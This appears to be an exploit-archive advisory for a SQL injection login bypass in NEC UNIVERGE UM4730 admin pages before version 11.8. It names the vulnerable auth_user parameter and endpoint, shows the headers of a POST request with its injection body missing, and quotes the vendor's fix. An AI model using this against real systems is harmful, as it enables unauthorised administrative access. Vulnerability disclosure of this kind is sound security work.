NEC Universe UM4730 SQL Injection

NEC Universe UM4730 versions prior to 11.8 suffers from a remote SQL injection vulnerability.

MD5 | bd6afe493c6cb60bbef4cc206749064a

# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
# Vulnerbility: SQL injection login bypass
# Date: 15-12-2016
# Exploit Author: b0x41s
# Author web:
# Vendor Homepage:
# Category: webapps
# Version:
# Tested on: Windows server 2008

The auth_user parameter is vulnerable to SQL injection.
The login can be bypassed.

POST /admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Lenght: 105
Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en

Fix answer from vendor:
The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.

Related Posts